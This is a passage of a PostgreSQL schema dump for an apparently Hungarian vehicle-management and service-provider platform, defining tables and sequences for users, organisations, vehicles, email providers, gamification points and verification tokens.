+ + +ALTER TABLE data.company_members_id_seq OWNER TO kincses; + +-- +-- Name: company_members_id_seq; Type: SEQUENCE OWNED BY; Schema: data; Owner: kincses +-- + +ALTER SEQUENCE data.company_members_id_seq OWNED BY data.company_members.id; + + +-- +-- Name: competitions; Type: TABLE; Schema: data; Owner: kincses +-- + +CREATE TABLE data.competitions ( + id integer NOT NULL, + name character varying NOT NULL, + description text, + start_date timestamp without time zone NOT NULL, + end_date timestamp without time zone NOT NULL, + is_active boolean +); + + +ALTER TABLE data.competitions OWNER TO kincses; + +-- +-- Name: competitions_id_seq; Type: SEQUENCE; Schema: data; Owner: kincses +-- + +CREATE SEQUENCE data.competitions_id_seq + AS integer + START WITH 1 + INCREMENT BY 1 + NO MINVALUE + NO MAXVALUE + CACHE 1; + + +ALTER TABLE data.competitions_id_seq OWNER TO kincses; + +-- +-- Name: competitions_id_seq; Type: SEQUENCE OWNED BY; Schema: data; Owner: kincses +-- + +ALTER SEQUENCE data.competitions_id_seq OWNED BY data.competitions.id; + + +-- +-- Name: credit_logs; Type: TABLE; Schema: data; Owner: kincses +-- + +CREATE TABLE data.credit_logs ( + id integer NOT NULL, + org_id integer, + amount numeric(10,2), + description text, + created_at timestamp with time zone DEFAULT CURRENT_TIMESTAMP +); + + +ALTER TABLE data.credit_logs OWNER TO kincses; + +-- +-- Name: credit_logs_id_seq; Type: SEQUENCE; Schema: data; Owner: kincses +-- + +CREATE SEQUENCE data.credit_logs_id_seq + AS integer + START WITH 1 + INCREMENT BY 1 + NO MINVALUE + NO MAXVALUE + CACHE 1; + + +ALTER TABLE data.credit_logs_id_seq OWNER TO kincses; + +-- +-- Name: credit_logs_id_seq; Type: SEQUENCE OWNED BY; Schema: data; Owner: kincses +-- + +ALTER SEQUENCE data.credit_logs_id_seq OWNED BY data.credit_logs.id; + + +-- +-- Name: email_logs; Type: TABLE; Schema: data; Owner: kincses +-- + +CREATE TABLE data.email_logs ( + id integer NOT NULL, + email character varying, + type character varying, + sent_at timestamp with time zone DEFAULT now(), + recipient character varying(255), + user_id integer, + provider_id integer, + status character varying(50) DEFAULT 'sent'::character varying, + email_type character varying(100) +); + + +ALTER TABLE data.email_logs OWNER TO kincses; + +-- +-- Name: email_logs_id_seq; Type: SEQUENCE; Schema: data; Owner: kincses +-- + +CREATE SEQUENCE data.email_logs_id_seq + AS integer + START WITH 1 + INCREMENT BY 1 + NO MINVALUE + NO MAXVALUE + CACHE 1; + + +ALTER TABLE data.email_logs_id_seq OWNER TO kincses; + +-- +-- Name: email_logs_id_seq; Type: SEQUENCE OWNED BY; Schema: data; Owner: kincses +-- + +ALTER SEQUENCE data.email_logs_id_seq OWNED BY data.email_logs.id; + + +-- +-- Name: email_provider_configs; Type: TABLE; Schema: data; Owner: kincses +-- + +CREATE TABLE data.email_provider_configs ( + id integer NOT NULL, + name character varying(50), + provider_type character varying(20), + priority integer, + settings json NOT NULL, + is_active boolean, + fail_count integer, + max_fail_threshold integer, + success_rate double precision +); + + +ALTER TABLE data.email_provider_configs OWNER TO kincses; + +-- +-- Name: email_provider_configs_id_seq; Type: SEQUENCE; Schema: data; Owner: kincses +-- + +CREATE SEQUENCE data.email_provider_configs_id_seq + AS integer + START WITH 1 + INCREMENT BY 1 + NO MINVALUE + NO MAXVALUE + CACHE 1; + + +ALTER TABLE data.email_provider_configs_id_seq OWNER TO kincses; + +-- +-- Name: email_provider_configs_id_seq; Type: SEQUENCE OWNED BY; Schema: data; Owner: kincses +-- + +ALTER SEQUENCE data.email_provider_configs_id_seq OWNED BY data.email_provider_configs.id; + + +-- +-- Name: email_providers; Type: TABLE; Schema: data; Owner: kincses +-- + +CREATE TABLE data.email_providers ( + id integer NOT NULL, + name character varying(50) NOT NULL, + priority integer DEFAULT 1, + provider_type character varying(10) DEFAULT 'SMTP'::character varying, + host character varying(255), + port integer, + username character varying(255), + password_hash character varying(255), + is_active boolean DEFAULT true, + daily_limit integer DEFAULT 300, + current_daily_usage integer DEFAULT 0 +); + + +ALTER TABLE data.email_providers OWNER TO kincses; + +-- +-- Name: email_providers_id_seq; Type: SEQUENCE; Schema: data; Owner: kincses +-- + +CREATE SEQUENCE data.email_providers_id_seq + AS integer + START WITH 1 + INCREMENT BY 1 + NO MINVALUE + NO MAXVALUE + CACHE 1; + + +ALTER TABLE data.email_providers_id_seq OWNER TO kincses; + +-- +-- Name: email_providers_id_seq; Type: SEQUENCE OWNED BY; Schema: data; Owner: kincses +-- + +ALTER SEQUENCE data.email_providers_id_seq OWNED BY data.email_providers.id; + + +-- +-- Name: email_templates; Type: TABLE; Schema: data; Owner: kincses +-- + +CREATE TABLE data.email_templates ( + id integer NOT NULL, + type public.emailtype, + subject character varying(255) NOT NULL, + body_html text NOT NULL +); + + +ALTER TABLE data.email_templates OWNER TO kincses; + +-- +-- Name: email_templates_id_seq; Type: SEQUENCE; Schema: data; Owner: kincses +-- + +CREATE SEQUENCE data.email_templates_id_seq + AS integer + START WITH 1 + INCREMENT BY 1 + NO MINVALUE + NO MAXVALUE + CACHE 1; + + +ALTER TABLE data.email_templates_id_seq OWNER TO kincses; + +-- +-- Name: email_templates_id_seq; Type: SEQUENCE OWNED BY; Schema: data; Owner: kincses +-- + +ALTER SEQUENCE data.email_templates_id_seq OWNED BY data.email_templates.id; + + +-- +-- Name: legal_acceptances; Type: TABLE; Schema: data; Owner: kincses +-- + +CREATE TABLE data.legal_acceptances ( + id integer NOT NULL, + user_id integer, + document_id integer, + accepted_at timestamp with time zone DEFAULT now(), + ip_address character varying(45), + user_agent text +); + + +ALTER TABLE data.legal_acceptances OWNER TO kincses; + +-- +-- Name: legal_acceptances_id_seq; Type: SEQUENCE; Schema: data; Owner: kincses +-- + +CREATE SEQUENCE data.legal_acceptances_id_seq + AS integer + START WITH 1 + INCREMENT BY 1 + NO MINVALUE + NO MAXVALUE + CACHE 1; + + +ALTER TABLE data.legal_acceptances_id_seq OWNER TO kincses; + +-- +-- Name: legal_acceptances_id_seq; Type: SEQUENCE OWNED BY; Schema: data; Owner: kincses +-- + +ALTER SEQUENCE data.legal_acceptances_id_seq OWNED BY data.legal_acceptances.id; + + +-- +-- Name: legal_documents; Type: TABLE; Schema: data; Owner: kincses +-- + +CREATE TABLE data.legal_documents ( + id integer NOT NULL, + title character varying(255), + content text NOT NULL, + version character varying(20) NOT NULL, + region_code character varying(5), + language character varying(5), + is_active boolean, + created_at timestamp with time zone DEFAULT now() +); + + +ALTER TABLE data.legal_documents OWNER TO kincses; + +-- +-- Name: legal_documents_id_seq; Type: SEQUENCE; Schema: data; Owner: kincses +-- + +CREATE SEQUENCE data.legal_documents_id_seq + AS integer + START WITH 1 + INCREMENT BY 1 + NO MINVALUE + NO MAXVALUE + CACHE 1; + + +ALTER TABLE data.legal_documents_id_seq OWNER TO kincses; + +-- +-- Name: legal_documents_id_seq; Type: SEQUENCE OWNED BY; Schema: data; Owner: kincses +-- + +ALTER SEQUENCE data.legal_documents_id_seq OWNED BY data.legal_documents.id; + + +-- +-- Name: level_configs; Type: TABLE; Schema: data; Owner: kincses +-- + +CREATE TABLE data.level_configs ( + id integer NOT NULL, + level_number integer NOT NULL, + min_points integer NOT NULL, + rank_name character varying NOT NULL +); + + +ALTER TABLE data.level_configs OWNER TO kincses; + +-- +-- Name: level_configs_id_seq; Type: SEQUENCE; Schema: data; Owner: kincses +-- + +CREATE SEQUENCE data.level_configs_id_seq + AS integer + START WITH 1 + INCREMENT BY 1 + NO MINVALUE + NO MAXVALUE + CACHE 1; + + +ALTER TABLE data.level_configs_id_seq OWNER TO kincses; + +-- +-- Name: level_configs_id_seq; Type: SEQUENCE OWNED BY; Schema: data; Owner: kincses +-- + +ALTER SEQUENCE data.level_configs_id_seq OWNED BY data.level_configs.id; + + +-- +-- Name: locations; Type: TABLE; Schema: data; Owner: kincses +-- + +CREATE TABLE data.locations ( + id integer NOT NULL, + name character varying(255), + address text, + latitude numeric(9,6), + longitude numeric(9,6), + created_at timestamp with time zone DEFAULT CURRENT_TIMESTAMP +); + + +ALTER TABLE data.locations OWNER TO kincses; + +-- +-- Name: locations_id_seq; Type: SEQUENCE; Schema: data; Owner: kincses +-- + +CREATE SEQUENCE data.locations_id_seq + AS integer + START WITH 1 + INCREMENT BY 1 + NO MINVALUE + NO MAXVALUE + CACHE 1; + + +ALTER TABLE data.locations_id_seq OWNER TO kincses; + +-- +-- Name: locations_id_seq; Type: SEQUENCE OWNED BY; Schema: data; Owner: kincses +-- + +ALTER SEQUENCE data.locations_id_seq OWNED BY data.locations.id; + + +-- +-- Name: org_subscriptions; Type: TABLE; Schema: data; Owner: kincses +-- + +CREATE TABLE data.org_subscriptions ( + id integer NOT NULL, + org_id integer, + tier_id integer, + valid_from timestamp with time zone DEFAULT CURRENT_TIMESTAMP, + valid_until timestamp with time zone, + is_active boolean DEFAULT true +); + + +ALTER TABLE data.org_subscriptions OWNER TO kincses; + +-- +-- Name: org_subscriptions_id_seq; Type: SEQUENCE; Schema: data; Owner: kincses +-- + +CREATE SEQUENCE data.org_subscriptions_id_seq + AS integer + START WITH 1 + INCREMENT BY 1 + NO MINVALUE + NO MAXVALUE + CACHE 1; + + +ALTER TABLE data.org_subscriptions_id_seq OWNER TO kincses; + +-- +-- Name: org_subscriptions_id_seq; Type: SEQUENCE OWNED BY; Schema: data; Owner: kincses +-- + +ALTER SEQUENCE data.org_subscriptions_id_seq OWNED BY data.org_subscriptions.id; + + +-- +-- Name: organization_locations; Type: TABLE; Schema: data; Owner: kincses +-- + +CREATE TABLE data.organization_locations ( + id integer NOT NULL, + organization_id integer, + label character varying(100), + address text, + latitude numeric(10,8), + longitude numeric(11,8), + is_main_location boolean DEFAULT false, + created_at timestamp with time zone DEFAULT CURRENT_TIMESTAMP +); + + +ALTER TABLE data.organization_locations OWNER TO kincses; + +-- +-- Name: organization_locations_id_seq; Type: SEQUENCE; Schema: data; Owner: kincses +-- + +CREATE SEQUENCE data.organization_locations_id_seq + AS integer + START WITH 1 + INCREMENT BY 1 + NO MINVALUE + NO MAXVALUE + CACHE 1; + + +ALTER TABLE data.organization_locations_id_seq OWNER TO kincses; + +-- +-- Name: organization_locations_id_seq; Type: SEQUENCE OWNED BY; Schema: data; Owner: kincses +-- + +ALTER SEQUENCE data.organization_locations_id_seq OWNED BY data.organization_locations.id; + + +-- +-- Name: organization_members; Type: TABLE; Schema: data; Owner: kincses +-- + +CREATE TABLE data.organization_members ( + id integer NOT NULL, + organization_id integer NOT NULL, + user_id integer NOT NULL, + role public.orguserrole, + is_permanent boolean +); + + +ALTER TABLE data.organization_members OWNER TO kincses; + +-- +-- Name: organization_members_id_seq; Type: SEQUENCE; Schema: data; Owner: kincses +-- + +CREATE SEQUENCE data.organization_members_id_seq + AS integer + START WITH 1 + INCREMENT BY 1 + NO MINVALUE + NO MAXVALUE + CACHE 1; + + +ALTER TABLE data.organization_members_id_seq OWNER TO kincses; + +-- +-- Name: organization_members_id_seq; Type: SEQUENCE OWNED BY; Schema: data; Owner: kincses +-- + +ALTER SEQUENCE data.organization_members_id_seq OWNED BY data.organization_members.id; + + +-- +-- Name: organizations; Type: TABLE; Schema: data; Owner: kincses +-- + +CREATE TABLE data.organizations ( + id integer NOT NULL, + name character varying NOT NULL, + org_type public.orgtype, + tax_number character varying, + founded_at date, + validation_status public.validationstatus, + owner_id integer, + ui_theme character varying, + created_at timestamp with time zone DEFAULT now(), + theme character varying DEFAULT 'system'::character varying, + is_active boolean DEFAULT true, + slug character varying(100) +); + + +ALTER TABLE data.organizations OWNER TO kincses; + +-- +-- Name: organizations_id_seq; Type: SEQUENCE; Schema: data; Owner: kincses +-- + +CREATE SEQUENCE data.organizations_id_seq + AS integer + START WITH 1 + INCREMENT BY 1 + NO MINVALUE + NO MAXVALUE + CACHE 1; + + +ALTER TABLE data.organizations_id_seq OWNER TO kincses; + +-- +-- Name: organizations_id_seq; Type: SEQUENCE OWNED BY; Schema: data; Owner: kincses +-- + +ALTER SEQUENCE data.organizations_id_seq OWNED BY data.organizations.id; + + +-- +-- Name: point_rules; Type: TABLE; Schema: data; Owner: kincses +-- + +CREATE TABLE data.point_rules ( + id integer NOT NULL, + action_key character varying NOT NULL, + points integer NOT NULL, + description character varying, + is_active boolean NOT NULL +); + + +ALTER TABLE data.point_rules OWNER TO kincses; + +-- +-- Name: point_rules_id_seq; Type: SEQUENCE; Schema: data; Owner: kincses +-- + +CREATE SEQUENCE data.point_rules_id_seq + AS integer + START WITH 1 + INCREMENT BY 1 + NO MINVALUE + NO MAXVALUE + CACHE 1; + + +ALTER TABLE data.point_rules_id_seq OWNER TO kincses; + +-- +-- Name: point_rules_id_seq; Type: SEQUENCE OWNED BY; Schema: data; Owner: kincses +-- + +ALTER SEQUENCE data.point_rules_id_seq OWNED BY data.point_rules.id; + + +-- +-- Name: points_ledger; Type: TABLE; Schema: data; Owner: kincses +-- + +CREATE TABLE data.points_ledger ( + id integer NOT NULL, + user_id integer NOT NULL, + points integer NOT NULL, + reason character varying NOT NULL, + created_at timestamp without time zone NOT NULL +); + + +ALTER TABLE data.points_ledger OWNER TO kincses; + +-- +-- Name: points_ledger_id_seq; Type: SEQUENCE; Schema: data; Owner: kincses +-- + +CREATE SEQUENCE data.points_ledger_id_seq + AS integer + START WITH 1 + INCREMENT BY 1 + NO MINVALUE + NO MAXVALUE + CACHE 1; + + +ALTER TABLE data.points_ledger_id_seq OWNER TO kincses; + +-- +-- Name: points_ledger_id_seq; Type: SEQUENCE OWNED BY; Schema: data; Owner: kincses +-- + +ALTER SEQUENCE data.points_ledger_id_seq OWNED BY data.points_ledger.id; + + +-- +-- Name: regional_settings; Type: TABLE; Schema: data; Owner: kincses +-- + +CREATE TABLE data.regional_settings ( + id integer NOT NULL, + country_code character varying NOT NULL, + currency character varying NOT NULL, + is_active boolean NOT NULL +); + + +ALTER TABLE data.regional_settings OWNER TO kincses; + +-- +-- Name: regional_settings_id_seq; Type: SEQUENCE; Schema: data; Owner: kincses +-- + +CREATE SEQUENCE data.regional_settings_id_seq + AS integer + START WITH 1 + INCREMENT BY 1 + NO MINVALUE + NO MAXVALUE + CACHE 1; + + +ALTER TABLE data.regional_settings_id_seq OWNER TO kincses; + +-- +-- Name: regional_settings_id_seq; Type: SEQUENCE OWNED BY; Schema: data; Owner: kincses +-- + +ALTER SEQUENCE data.regional_settings_id_seq OWNED BY data.regional_settings.id; + + +-- +-- Name: service_providers; Type: TABLE; Schema: data; Owner: kincses +-- + +CREATE TABLE data.service_providers ( + id integer NOT NULL, + name character varying NOT NULL, + address character varying NOT NULL, + category character varying, + status data.moderation_status_enum NOT NULL, + source data.source_type_enum NOT NULL, + validation_score integer, + evidence_image_path character varying, + added_by_user_id integer, + created_at timestamp without time zone +); + + +ALTER TABLE data.service_providers OWNER TO kincses; + +-- +-- Name: service_providers_id_seq; Type: SEQUENCE; Schema: data; Owner: kincses +-- + +CREATE SEQUENCE data.service_providers_id_seq + AS integer + START WITH 1 + INCREMENT BY 1 + NO MINVALUE + NO MAXVALUE + CACHE 1; + + +ALTER TABLE data.service_providers_id_seq OWNER TO kincses; + +-- +-- Name: service_providers_id_seq; Type: SEQUENCE OWNED BY; Schema: data; Owner: kincses +-- + +ALTER SEQUENCE data.service_providers_id_seq OWNED BY data.service_providers.id; + + +-- +-- Name: service_specialties; Type: TABLE; Schema: data; Owner: kincses +-- + +CREATE TABLE data.service_specialties ( + id integer NOT NULL, + parent_id integer, + name character varying(100), + slug character varying(100) +); + + +ALTER TABLE data.service_specialties OWNER TO kincses; + +-- +-- Name: service_specialties_id_seq; Type: SEQUENCE; Schema: data; Owner: kincses +-- + +CREATE SEQUENCE data.service_specialties_id_seq + AS integer + START WITH 1 + INCREMENT BY 1 + NO MINVALUE + NO MAXVALUE + CACHE 1; + + +ALTER TABLE data.service_specialties_id_seq OWNER TO kincses; + +-- +-- Name: service_specialties_id_seq; Type: SEQUENCE OWNED BY; Schema: data; Owner: kincses +-- + +ALTER SEQUENCE data.service_specialties_id_seq OWNED BY data.service_specialties.id; + + +-- +-- Name: subscription_tiers; Type: TABLE; Schema: data; Owner: kincses +-- + +CREATE TABLE data.subscription_tiers ( + id integer NOT NULL, + name character varying(50), + rules jsonb, + is_custom boolean DEFAULT false +); + + +ALTER TABLE data.subscription_tiers OWNER TO kincses; + +-- +-- Name: subscription_tiers_id_seq; Type: SEQUENCE; Schema: data; Owner: kincses +-- + +CREATE SEQUENCE data.subscription_tiers_id_seq + AS integer + START WITH 1 + INCREMENT BY 1 + NO MINVALUE + NO MAXVALUE + CACHE 1; + + +ALTER TABLE data.subscription_tiers_id_seq OWNER TO kincses; + +-- +-- Name: subscription_tiers_id_seq; Type: SEQUENCE OWNED BY; Schema: data; Owner: kincses +-- + +ALTER SEQUENCE data.subscription_tiers_id_seq OWNED BY data.subscription_tiers.id; + + +-- +-- Name: system_settings; Type: TABLE; Schema: data; Owner: kincses +-- + +CREATE TABLE data.system_settings ( + key_name character varying NOT NULL, + value_json json NOT NULL, + description character varying, + region_code character varying(5), + tier_id integer, + org_id integer +); + + +ALTER TABLE data.system_settings OWNER TO kincses; + +-- +-- Name: translations; Type: TABLE; Schema: data; Owner: kincses +-- + +CREATE TABLE data.translations ( + id integer NOT NULL, + key character varying(100) NOT NULL, + lang_code character varying(5) NOT NULL, + value text NOT NULL, + is_published boolean +); + + +ALTER TABLE data.translations OWNER TO kincses; + +-- +-- Name: translations_id_seq; Type: SEQUENCE; Schema: data; Owner: kincses +-- + +CREATE SEQUENCE data.translations_id_seq + AS integer + START WITH 1 + INCREMENT BY 1 + NO MINVALUE + NO MAXVALUE + CACHE 1; + + +ALTER TABLE data.translations_id_seq OWNER TO kincses; + +-- +-- Name: translations_id_seq; Type: SEQUENCE OWNED BY; Schema: data; Owner: kincses +-- + +ALTER SEQUENCE data.translations_id_seq OWNED BY data.translations.id; + + +-- +-- Name: user_badges; Type: TABLE; Schema: data; Owner: kincses +-- + +CREATE TABLE data.user_badges ( + id integer NOT NULL, + user_id integer NOT NULL, + badge_id integer NOT NULL, + earned_at timestamp without time zone NOT NULL +); + + +ALTER TABLE data.user_badges OWNER TO kincses; + +-- +-- Name: user_badges_id_seq; Type: SEQUENCE; Schema: data; Owner: kincses +-- + +CREATE SEQUENCE data.user_badges_id_seq + AS integer + START WITH 1 + INCREMENT BY 1 + NO MINVALUE + NO MAXVALUE + CACHE 1; + + +ALTER TABLE data.user_badges_id_seq OWNER TO kincses; + +-- +-- Name: user_badges_id_seq; Type: SEQUENCE OWNED BY; Schema: data; Owner: kincses +-- + +ALTER SEQUENCE data.user_badges_id_seq OWNED BY data.user_badges.id; + + +-- +-- Name: user_scores; Type: TABLE; Schema: data; Owner: kincses +-- + +CREATE TABLE data.user_scores ( + id integer NOT NULL, + user_id integer, + competition_id integer, + points integer, + last_updated timestamp without time zone +); + + +ALTER TABLE data.user_scores OWNER TO kincses; + +-- +-- Name: user_scores_id_seq; Type: SEQUENCE; Schema: data; Owner: kincses +-- + +CREATE SEQUENCE data.user_scores_id_seq + AS integer + START WITH 1 + INCREMENT BY 1 + NO MINVALUE + NO MAXVALUE + CACHE 1; + + +ALTER TABLE data.user_scores_id_seq OWNER TO kincses; + +-- +-- Name: user_scores_id_seq; Type: SEQUENCE OWNED BY; Schema: data; Owner: kincses +-- + +ALTER SEQUENCE data.user_scores_id_seq OWNED BY data.user_scores.id; + + +-- +-- Name: user_stats; Type: TABLE; Schema: data; Owner: kincses +-- + +CREATE TABLE data.user_stats ( + id integer NOT NULL, + user_id integer NOT NULL, + total_points integer NOT NULL, + current_level integer NOT NULL, + last_activity timestamp without time zone NOT NULL +); + + +ALTER TABLE data.user_stats OWNER TO kincses; + +-- +-- Name: user_stats_id_seq; Type: SEQUENCE; Schema: data; Owner: kincses +-- + +CREATE SEQUENCE data.user_stats_id_seq + AS integer + START WITH 1 + INCREMENT BY 1 + NO MINVALUE + NO MAXVALUE + CACHE 1; + + +ALTER TABLE data.user_stats_id_seq OWNER TO kincses; + +-- +-- Name: user_stats_id_seq; Type: SEQUENCE OWNED BY; Schema: data; Owner: kincses +-- + +ALTER SEQUENCE data.user_stats_id_seq OWNED BY data.user_stats.id; + + +-- +-- Name: user_vehicles; Type: TABLE; Schema: data; Owner: kincses +-- + +CREATE TABLE data.user_vehicles ( + id integer NOT NULL, + vin character varying NOT NULL, + license_plate character varying NOT NULL, + variant_id integer, + color character varying, + purchase_date timestamp without time zone, + purchase_price double precision, + current_odometer double precision, + extras json, + current_org_id integer, + created_at timestamp with time zone DEFAULT now(), + is_deleted boolean +); + + +ALTER TABLE data.user_vehicles OWNER TO kincses; + +-- +-- Name: user_vehicles_id_seq; Type: SEQUENCE; Schema: data; Owner: kincses +-- + +CREATE SEQUENCE data.user_vehicles_id_seq + AS integer + START WITH 1 + INCREMENT BY 1 + NO MINVALUE + NO MAXVALUE + CACHE 1; + + +ALTER TABLE data.user_vehicles_id_seq OWNER TO kincses; + +-- +-- Name: user_vehicles_id_seq; Type: SEQUENCE OWNED BY; Schema: data; Owner: kincses +-- + +ALTER SEQUENCE data.user_vehicles_id_seq OWNED BY data.user_vehicles.id; + + +-- +-- Name: users; Type: TABLE; Schema: data; Owner: kincses +-- + +CREATE TABLE data.users ( + id integer NOT NULL, + email character varying NOT NULL, + first_name character varying, + last_name character varying, + birthday date, + is_active boolean, + is_banned boolean, + is_gdpr_deleted boolean, + previous_login_count integer, + created_at timestamp with time zone DEFAULT now(), + verified_at timestamp with time zone, + hashed_password character varying, + role character varying DEFAULT 'user'::character varying, + is_superuser boolean DEFAULT false, + is_company boolean DEFAULT false, + updated_at timestamp with time zone, + company_name character varying, + tax_number character varying, + region_code character varying DEFAULT 'HU'::character varying +); + + +ALTER TABLE data.users OWNER TO kincses; + +-- +-- Name: users_id_seq; Type: SEQUENCE; Schema: data; Owner: kincses +-- + +CREATE SEQUENCE data.users_id_seq + AS integer + START WITH 1 + INCREMENT BY 1 + NO MINVALUE + NO MAXVALUE + CACHE 1; + + +ALTER TABLE data.users_id_seq OWNER TO kincses; + +-- +-- Name: users_id_seq; Type: SEQUENCE OWNED BY; Schema: data; Owner: kincses +-- + +ALTER SEQUENCE data.users_id_seq OWNED BY data.users.id; + + +-- +-- Name: vehicle_brands; Type: TABLE; Schema: data; Owner: kincses +-- + +CREATE TABLE data.vehicle_brands ( + id integer NOT NULL, + name character varying NOT NULL, + origin_country character varying, + slug character varying, + country_code character varying, + category_id integer +); + + +ALTER TABLE data.vehicle_brands OWNER TO kincses; + +-- +-- Name: vehicle_brands_id_seq; Type: SEQUENCE; Schema: data; Owner: kincses +-- + +CREATE SEQUENCE data.vehicle_brands_id_seq + AS integer + START WITH 1 + INCREMENT BY 1 + NO MINVALUE + NO MAXVALUE + CACHE 1; + + +ALTER TABLE data.vehicle_brands_id_seq OWNER TO kincses; + +-- +-- Name: vehicle_brands_id_seq; Type: SEQUENCE OWNED BY; Schema: data; Owner: kincses +-- + +ALTER SEQUENCE data.vehicle_brands_id_seq OWNED BY data.vehicle_brands.id; + + +-- +-- Name: vehicle_categories; Type: TABLE; Schema: data; Owner: kincses +-- + +CREATE TABLE data.vehicle_categories ( + id integer NOT NULL, + name character varying NOT NULL, + slug character varying +); + + +ALTER TABLE data.vehicle_categories OWNER TO kincses; + +-- +-- Name: vehicle_categories_id_seq; Type: SEQUENCE; Schema: data; Owner: kincses +-- + +CREATE SEQUENCE data.vehicle_categories_id_seq + AS integer + START WITH 1 + INCREMENT BY 1 + NO MINVALUE + NO MAXVALUE + CACHE 1; + + +ALTER TABLE data.vehicle_categories_id_seq OWNER TO kincses; + +-- +-- Name: vehicle_categories_id_seq; Type: SEQUENCE OWNED BY; Schema: data; Owner: kincses +-- + +ALTER SEQUENCE data.vehicle_categories_id_seq OWNED BY data.vehicle_categories.id; + + +-- +-- Name: vehicle_events; Type: TABLE; Schema: data; Owner: kincses +-- + +CREATE TABLE data.vehicle_events ( + id integer NOT NULL, + vehicle_id integer, + service_provider_id integer, + event_type character varying(100), + description text, + odometer_reading integer, + event_date timestamp with time zone DEFAULT CURRENT_TIMESTAMP +); + + +ALTER TABLE data.vehicle_events OWNER TO kincses; + +-- +-- Name: vehicle_events_id_seq; Type: SEQUENCE; Schema: data; Owner: kincses +-- + +CREATE SEQUENCE data.vehicle_events_id_seq + AS integer + START WITH 1 + INCREMENT BY 1 + NO MINVALUE + NO MAXVALUE + CACHE 1; + + +ALTER TABLE data.vehicle_events_id_seq OWNER TO kincses; + +-- +-- Name: vehicle_events_id_seq; Type: SEQUENCE OWNED BY; Schema: data; Owner: kincses +-- + +ALTER SEQUENCE data.vehicle_events_id_seq OWNED BY data.vehicle_events.id; + + +-- +-- Name: vehicle_models; Type: TABLE; Schema: data; Owner: kincses +-- + +CREATE TABLE data.vehicle_models ( + id integer NOT NULL, + brand_id integer, + category_id integer, + name character varying NOT NULL, + year_start integer, + year_end integer, + slug character varying +); + + +ALTER TABLE data.vehicle_models OWNER TO kincses; + +-- +-- Name: vehicle_models_id_seq; Type: SEQUENCE; Schema: data; Owner: kincses +-- + +CREATE SEQUENCE data.vehicle_models_id_seq + AS integer + START WITH 1 + INCREMENT BY 1 + NO MINVALUE + NO MAXVALUE + CACHE 1; + + +ALTER TABLE data.vehicle_models_id_seq OWNER TO kincses; + +-- +-- Name: vehicle_models_id_seq; Type: SEQUENCE OWNED BY; Schema: data; Owner: kincses +-- + +ALTER SEQUENCE data.vehicle_models_id_seq OWNED BY data.vehicle_models.id; + + +-- +-- Name: vehicle_ownership; Type: TABLE; Schema: data; Owner: kincses +-- + +CREATE TABLE data.vehicle_ownership ( + id integer NOT NULL, + vehicle_id integer NOT NULL, + user_id integer NOT NULL, + role character varying(20), + license_plate character varying(20), + is_active boolean, + start_date date DEFAULT CURRENT_DATE, + end_date date +); + + +ALTER TABLE data.vehicle_ownership OWNER TO kincses; + +-- +-- Name: vehicle_ownership_id_seq; Type: SEQUENCE; Schema: data; Owner: kincses +-- + +CREATE SEQUENCE data.vehicle_ownership_id_seq + AS integer + START WITH 1 + INCREMENT BY 1 + NO MINVALUE + NO MAXVALUE + CACHE 1; + + +ALTER TABLE data.vehicle_ownership_id_seq OWNER TO kincses; + +-- +-- Name: vehicle_ownership_id_seq; Type: SEQUENCE OWNED BY; Schema: data; Owner: kincses +-- + +ALTER SEQUENCE data.vehicle_ownership_id_seq OWNED BY data.vehicle_ownership.id; + + +-- +-- Name: vehicle_variants; Type: TABLE; Schema: data; Owner: kincses +-- + +CREATE TABLE data.vehicle_variants ( + id integer NOT NULL, + model_id integer, + engine_size double precision, + power_kw double precision, + spec_data json +); + + +ALTER TABLE data.vehicle_variants OWNER TO kincses; + +-- +-- Name: vehicle_variants_id_seq; Type: SEQUENCE; Schema: data; Owner: kincses +-- + +CREATE SEQUENCE data.vehicle_variants_id_seq + AS integer + START WITH 1 + INCREMENT BY 1 + NO MINVALUE + NO MAXVALUE + CACHE 1; + + +ALTER TABLE data.vehicle_variants_id_seq OWNER TO kincses; + +-- +-- Name: vehicle_variants_id_seq; Type: SEQUENCE OWNED BY; Schema: data; Owner: kincses +-- + +ALTER SEQUENCE data.vehicle_variants_id_seq OWNED BY data.vehicle_variants.id; + + +-- +-- Name: vehicles; Type: TABLE; Schema: data; Owner: kincses +-- + +CREATE TABLE data.vehicles ( + id integer NOT NULL, + model_id integer NOT NULL, + license_plate character varying(20), + vin character varying(50), + manufacture_year integer, + color character varying(50), + created_at timestamp with time zone DEFAULT CURRENT_TIMESTAMP, + updated_at timestamp with time zone DEFAULT CURRENT_TIMESTAMP, + category character varying(50), + current_odometer integer DEFAULT 0, + engine_number character varying(100), + base_color character varying(50) +); + + +ALTER TABLE data.vehicles OWNER TO kincses; + +-- +-- Name: vehicles_id_seq; Type: SEQUENCE; Schema: data; Owner: kincses +-- + +CREATE SEQUENCE data.vehicles_id_seq + AS integer + START WITH 1 + INCREMENT BY 1 + NO MINVALUE + NO MAXVALUE + CACHE 1; + + +ALTER TABLE data.vehicles_id_seq OWNER TO kincses; + +-- +-- Name: vehicles_id_seq; Type: SEQUENCE OWNED BY; Schema: data; Owner: kincses +-- + +ALTER SEQUENCE data.vehicles_id_seq OWNED BY data.vehicles.id; + + +-- +-- Name: verification_tokens; Type: TABLE; Schema: data; Owner: kincses +-- + +CREATE TABLE data.verification_tokens ( + id integer NOT NULL, + user_id integer, + token character varying(255), + token_type public.tokentype, + expires_at timestamp with time zone, + created_at timestamp with time zone DEFAULT now(), + token_hash text, + is_used boolean DEFAULT false +); + + +ALTER TABLE data.verification_tokens OWNER TO kincses; + +-- +-- Name: verification_tokens_id_seq; Type: SEQUENCE; Schema: data; Owner: kincses +-- + +CREATE SEQUENCE data.verification_tokens_id_seq + AS integer + START WITH 1 + INCREMENT BY 1 + NO MINVALUE + NO MAXVALUE + CACHE 1; + + +ALTER TABLE data.verification_tokens_id_seq OWNER TO kincses; + +-- +-- Name: verification_tokens_id_seq; Type: SEQUENCE OWNED BY; Schema: data; Owner: kincses +-- + +ALTER SEQUENCE data.verification_tokens_id_seq OWNED BY data.verification_tokens.id; + + +-- +-- Name: votes; Type: TABLE; Schema: data; Owner: kincses +-- + +CREATE TABLE data.votes ( + id integer NOT NULL, + user_id integer NOT NULL, + provider_id integer NOT NULL, + vote_value integer NOT NULL +); + + +ALTER TABLE data.votes OWNER TO kincses; + +-- +-- Name: votes_id_seq; Type: SEQUENCE; Schema: data; Owner: kincses +-- + +CREATE SEQUENCE data.votes_id_seq + AS integer + START WITH 1 + INCREMENT BY 1 + NO MINVALUE + NO MAXVALUE + CACHE 1; + + +ALTER TABLE data.votes_id_seq OWNER TO kincses; + +-- +-- Name: votes_id_seq; Type: 